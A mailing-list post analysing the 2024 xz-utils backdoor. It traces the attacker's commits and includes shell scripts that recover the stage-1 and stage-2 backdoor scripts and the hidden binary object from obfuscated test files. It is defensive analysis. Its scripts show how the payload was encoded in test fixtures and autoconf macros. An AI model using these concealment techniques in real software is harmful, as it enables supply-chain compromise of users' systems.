Re: GNU Coding Standards, automake, and the recent xz-utils backdoor
From: Jacob Bachmeyer
Subject: Re: GNU Coding Standards, automake, and the recent xz-utils backdoor
Date: Mon, 01 Apr 2024 00:34:02 -0500
User-agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.22) Gecko/20090807 MultiZilla/1.8.3.4e SeaMonkey/1.1.17 Mnenhy/0.7.6.0
Tomas Volf wrote:
> On 2024-03-31 14:50:47 -0400, Eric Gallager wrote:
>>>> With a reproducible build system, multiple maintainers can "make dist"
>>>> and compare the output to cross-check for erroneous / malicious dist
>>>> environments. Multiple signatures should be harder to compromise,
>>>> assuming each is independent and generally trustworthy.
>>> This can only work if a package /has/ multiple active maintainers.
>> Well, other people besides the maintainers can also run `make dist`
>> and `make distcheck`. My idea was to get end-users in the habit of
>> running `make distcheck` themselves before installing stuff. And if
>> that's too much to ask of end users, I'd also point out that there are
>> multiple kinds of maintainer: besides the upstream maintainer, there
>> are also usually separate distro maintainers. Even if there's only 1
>> upstream maintainer, as was the case here, I still think that it would
>> be good to get distro maintainers in the habit of including `make
>> distcheck` as part of their own release process, before they accept
>> updates from upstream.
> What would be helpful is if `make dist' would guarantee to produce the same
> tarball (bit-to-bit) each time it is run, assuming the tooling is the same
> version. Currently I believe that is not the case (at least due to timestamps).
A "tardiff" tool that ignores timestamps would be a solution to that
problem, but not to this backdoor.
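As a rough illustration of what such a comparison could look like, here is a minimal sketch. The names tardiff and tar_manifest are hypothetical (no existing tool is implied), and it assumes GNU tar, sha256sum, and member names without embedded newlines. It compares only member names and contents, so timestamps, ownership, and permissions are ignored. It would flag two `make dist' outputs that differ in content, but it does nothing about a backdoor that every copy of the release tarball already contains.

```shell
#!/bin/sh
# Sketch only: "tardiff" and "tar_manifest" are hypothetical names.

# Print "<sha256>  <member>" for every regular file in a tarball,
# sorted by member name, so that metadata such as mtime is ignored.
tar_manifest () {
    tmp=$(mktemp -d) || return 1
    tar -xf "$1" -C "$tmp" || { rm -rf "$tmp"; return 1; }
    (cd "$tmp" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k 2)
    rm -rf "$tmp"
}

# Exit status: 0 = same names and contents, 1 = different, 2 = error.
tardiff () {
    a=$(tar_manifest "$1") || return 2
    b=$(tar_manifest "$2") || return 2
    [ "$a" = "$b" ]
}
```

Two maintainers could each run `make dist' and then run tardiff on the two results; a nonzero status means the contents differ somewhere.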
> Combined with GNU Guix that would allow simple way to verify that `make dist'
> was used, and the resulting artifact not tampered with, even without any central
> signing.
The Guix "challenge" operation would not have detected this backdoor
because *it* *was* *in* *the* *upstream* *release*. The build service
works from that release tarball and you build from that same release
tarball. GNU Guix ensures an equivalent build environment and your
results *will* match---either the backdoor was not inserted or it was
inserted in both builds.
The flow of the attack as I understand it was:
(0) (speculation on motivation) The attacker wanted a "Golden Key"
to SSH and started looking for ways to backdoor sshd.
(1) The attacker starts a sockpuppet campaign and manages to get
one of his sockpuppets appointed co-maintainer of xz-utils.
(2) [2023-06-27] The sockpuppet merges a pull request believed to
be from another sockpuppet in commit
ee44863ae88e377a5df10db007ba9bfadde3d314.
(3) [2024-02-15] The sockpuppet "updates m4/.gitignore" to add
build-to-host.m4 to the list in commit
4323bc3e0c1e1d2037d5e670a3bf6633e8a3031e.
(4) [2024-02-23] The sockpuppet adds 5 files to the xz-utils
testsuite in commit cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0.
(5) [2024-03-08] To cover tracks, the sockpuppet finally adds a
test using bad-3-corrupt_lzma2.xz in commit
a3a29bbd5d86183fc7eae8f0182dace374e778d8.
(6) [2024-03-08] The sockpuppet revises two of those files with a
lame excuse in commit a3a29bbd5d86183fc7eae8f0182dace374e778d8.
The quick analysis of the Git history supporting steps 2 - 6 above has
turned up another interesting detail: no version of configure.ac
actually committed ever used the gl_BUILD_TO_HOST macro. An analysis
found on pastebin noted that build-to-host.m4 is a dependency of
gettext.m4. Following up finds commit
3adaddd73c8edcceaed059e859bd5262df65fc5a of 2023-02-18 in the GNU
gettext repository introduced the use of gl_BUILD_TO_HOST, apparently as
part of moving some existing path translation logic to gnulib and
generalizing it for use elsewhere. This commit is innocent (it is
*extremely* unlikely that Bruno Haible was involved in the backdoor
campaign) and also explains why the backdoor was checking for "dnl
Convert it to C string syntax." in m4/gettext.m4: that comment was
removed in the same commit that switched to using gl_BUILD_TO_HOST. The
change to gettext also occurred about a year before the sockpuppet began
to take advantage of it.
It almost "feels like" the attacker was waiting for an opportunity to
make plausible changes to autoconf macros and finally got one when
updating the m4/ files for the 5.6.0 release. Could someone with the
release tarballs confirm that m4/gettext.m4 was updated between
v5.5.2beta and v5.6.0? I doubt the entire backdoor was developed in the
week between those two commits. In fact, the timing around introducing
ifuncs suggests to me that the binary blob was at least well into
development by mid-2023.
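For anyone who does have both tarballs, the check asked for above could be sketched as follows. The function name member_changed is hypothetical, the tarball file names and top-level directory names in the usage comment are assumptions, and GNU tar (for -O and automatic decompression) is assumed.

```shell
#!/bin/sh
# Sketch: did one member change between two release tarballs?
# Exit status: 0 = changed, 1 = identical, 2 = could not extract.
# usage: member_changed OLD_TARBALL OLD_MEMBER NEW_TARBALL NEW_MEMBER
member_changed () {
    tmp=$(mktemp -d) || return 2
    if tar -xOf "$1" "$2" > "$tmp/old" && tar -xOf "$3" "$4" > "$tmp/new"; then
        if cmp -s "$tmp/old" "$tmp/new"; then rc=1; else rc=0; fi
    else
        rc=2
    fi
    rm -rf "$tmp"
    return "$rc"
}

# Hypothetical invocation (file and directory names are assumptions):
#   member_changed xz-5.5.2beta.tar.gz xz-5.5.2beta/m4/gettext.m4 \
#                  xz-5.6.0.tar.gz     xz-5.6.0/m4/gettext.m4
```

Piping the same `tar -xOf' output through `grep -F "dnl Convert it to C string syntax."' would additionally show which of the two versions still carries the comment the backdoor looked for.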
The commit message at step 2 claims that using ifuncs with
-fsanitize=address causes segfaults. If this is true generally, the
glibc team should probably reconsider whether the abuse potential is
worth the benefit of the feature and possibly investigate how the
feature was introduced to glibc. If this was an excuse, it provided a
clever way to prevent oss-fuzz from finding the backdoor, as disabling
ifuncs provides a conveniently hidden flag to disable the backdoor.
While double-checking the above, I stumbled across another very
suspicious commit in the repository: commit
e446ab7a18abfde18f8d1cf02a914df72b1370e3 by Jia Tan on 2024-02-12
creating a separate "safe" range decoder mode because the next commit
removes some bounds checks.
Lastly on this topic, some of the blame for this needs to fall on the
systemd maintainers and their "katamari" architecture. There is no good
reason for notifications of daemon startup to pull in liblzma, but using
libsystemd for that purpose does exactly that, and ended up getting
xz-utils targeted as a means of getting to sshd without the OpenSSH
maintainers noticing.
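Whether a given sshd binary is exposed to this dependency chain can be checked from its resolved shared libraries. This is only a sketch: the function name systemd_lzma_deps is hypothetical, and it assumes an `ldd' whose output names each library as lib<name>.so.<version>.

```shell
#!/bin/sh
# Sketch: filter ldd-style output on stdin down to the lines naming
# libsystemd or liblzma.  Exit status is nonzero if neither appears.
systemd_lzma_deps () {
    grep -E 'lib(systemd|lzma)\.so'
}

# Hypothetical usage on a system with sshd installed:
#   ldd "$(command -v sshd)" | systemd_lzma_deps
```

An sshd that prints nothing here does not load liblzma at startup, at least not through its direct link-time dependencies.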
I have also done a bit more work and replicated extracting the backdoors
from the repository. Here are scripts to extract them:
8<------ unpack-1.sh
#!/bin/sh
# Unpack first stage backdoor script from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression.
set -x
# Swap tab<->space and '-'<->'_' to turn the "corrupt" test file back
# into a valid .xz stream.
tr "\t \-_" " \t_\-" \
    < xz-backdoored/tests/files/bad-3-corrupt_lzma2.xz \
    > backdoor-1.xz
7z l -slt backdoor-1.xz
7z e -y backdoor-1.xz
# EOF
8<------
8<------ unpack-2a.sh
#!/bin/sh
# Unpack second stage backdoor script from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression where possible.
# Adapted from original backdoor-1 script.
set -x
# Repeatedly skip 1024 bytes and keep the next 2048, then keep a 939-byte tail.
extract () (
    set +x # very noisy
    # 16 rounds, listed explicitly: POSIX sh has no {1..16} brace expansion.
    for cycle in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16; do
        (head -c +1024 >/dev/null) && head -c +2048
    done
    (head -c +1024 >/dev/null) && head -c +939
)
7z e -so xz-backdoored/tests/files/good-large_compressed.lzma \
    | extract \
    | tail -c +31233 \
    | tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" \
    | tee backdoor-2a.lzma1 \
    | xz -F raw --lzma1 -dc \
    > backdoor-2a
# EOF
8<------
8<------ unpack-2b.sh
#!/bin/sh
# Unpack binary backdoor module from xz-backdoored.
# To guard against other trickery, use 7-zip for decompression where possible.
# Adapted from original backdoor scripts.
set -x
# Repeatedly skip 1024 bytes and keep the next 2048, then keep a 939-byte tail.
extract () (
    set +x # very noisy
    # 16 rounds, listed explicitly: POSIX sh has no {1..16} brace expansion.
    for cycle in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16; do
        (head -c +1024 >/dev/null) && head -c +2048
    done
    (head -c +1024 >/dev/null) && head -c +939
)
7z e -so xz-backdoored/tests/files/good-large_compressed.lzma \
    | extract \
    | LC_ALL=C sed "s/\(.\)/\1\n/g" \
    | LC_ALL=C awk '
BEGIN {
    FS="\n"
    RS="\n"
    ORS=""
    m=256
    # t[] maps each byte to its numeric value; c[] is the cipher state.
    for (i=0;i<m;i++) {
        t[sprintf("x%c",i)]=i
        c[i]=((i*7)+5)%m
    }
    # Warm-up: shuffle the state 8192 times before any output.
    i=0; j=0
    for (l=0;l<8192;l++) {
        i=(i+1)%m; a=c[i]
        j=(j+a)%m; c[i]=c[j]; c[j]=a
    }
}
{
    # One input byte per record; an empty record stands for a newline byte.
    v=t["x" (NF<1?RS:$1)]
    i=(i+1)%m; a=c[i]
    j=(j+a)%m; b=c[j]
    c[i]=b; c[j]=a
    k=c[(a+b)%m]
    printf "%c",(v+k)%m
}' \
    | tee backdoor-2b.xz \
    | xz -dc --single-stream \
    | ( (head -c +0 >/dev/null 2>&1) && head -c +88664) \
    > backdoor-2b.o
# EOF
8<------
The above scripts assume that the backdoored code has been unpacked into
xz-backdoored in the current directory. As you can see by reading them,
they fetch the backdoor code from the tests/files/bad-3-corrupt_lzma2.xz
and tests/files/good-large_compressed.lzma files.
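The byte substitution that unpack-1 applies is easy to see on a short sample. The function name swap below is only for illustration, and GNU tr is assumed.

```shell
#!/bin/sh
# Same tr call as in unpack-1: tab<->space and '-'<->'_' are exchanged,
# every other byte passes through unchanged.
swap () {
    tr "\t \-_" " \t_\-"
}

printf 'a-b_c\n' | swap          # prints: a_b-c
printf 'a-b_c\n' | swap | swap   # prints: a-b_c (the mapping is its own inverse)
```

Because the mapping is its own inverse, the same call could have been used to produce the "corrupt" test file from a valid .xz stream in the first place.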
The unpack-1 and unpack-2a scripts yield the shell script backdoor code,
while the unpack-2b script yields the binary object that was hidden in
the repository.
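The byte counts in the extract function can be checked on synthetic input. The sketch below repeats the same skip/keep pattern with an explicit counter; it assumes a head that accepts -c and reads no more than the requested number of bytes from a pipe, as GNU head does.

```shell
#!/bin/sh
# Same skip/keep pattern as extract in the scripts above.
extract () {
    n=0
    while [ "$n" -lt 16 ]; do
        head -c 1024 >/dev/null && head -c 2048
        n=$((n + 1))
    done
    head -c 1024 >/dev/null && head -c 939
}

# Input consumed: 16 * (1024 + 2048) + 1024 + 939 = 51115 bytes.
# Output kept:    16 * 2048 + 939                 = 33707 bytes.
head -c 51115 /dev/zero | extract | wc -c

# unpack-2a then keeps everything from byte 31233 onward,
# that is 33707 - 31233 + 1 = 2475 bytes.
head -c 51115 /dev/zero | extract | tail -c +31233 | wc -c
```

So only the first 51115 bytes of the decompressed good-large_compressed.lzma matter to either script, and the second stage script comes from the last 2475 bytes of what extract keeps.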
All backdoor-1 does is unpack and execute backdoor-2a.
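The long tr argument in unpack-2a is a fixed byte permutation: its six octal ranges are disjoint and together cover all 256 byte values, which are then mapped onto \0-\377 in order. A small sketch to confirm the count (the function name tr_set_size is hypothetical):

```shell
#!/bin/sh
# Sum the sizes of octal ranges written as LO-HI, e.g. 114-321.
# A leading 0 makes the shell arithmetic read each bound as octal.
tr_set_size () {
    total=0
    for r in "$@"; do
        lo=$((0${r%-*}))
        hi=$((0${r#*-}))
        total=$((total + hi - lo + 1))
    done
    echo "$total"
}

tr_set_size 114-321 322-377 35-47 14-34 0-13 50-113   # prints: 256
```

In decimal the ranges are 76-209, 210-255, 29-39, 12-28, 0-11, and 40-75, so for example input byte 76 becomes output byte 0.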
Emacs makes short work (make the region span the file; C-M-\) of
indenting the backdoor-2a code, which makes the control flow clear and
helps to explain how this worked. The backdoor-2a script is run twice,
once as part of configure (possibly config.status actually), which
modifies src/liblzma/Makefile to unpack and run the backdoor-1 script
again using am__dist_setup, am__test_dir, and am__strip_prefix variables
to hide the commands that unpack and run backdoor-1, and once during
make to actually unpack the backdoor. My previous conclusion that an
unreasonably observant user might notice make not building the two affected
objects is wrong---make builds them first and the backdoor script
rebuilds them to include and call the hidden binary object. Also, it
seems that config.status somehow gets deleted during the build, since
backdoor-2a uses an if/elif/fi sequence to determine whether to alter
src/liblzma/Makefile or apply the hidden object. This is odd but does
not impede recovering the backdoor artifacts.
-- Jacob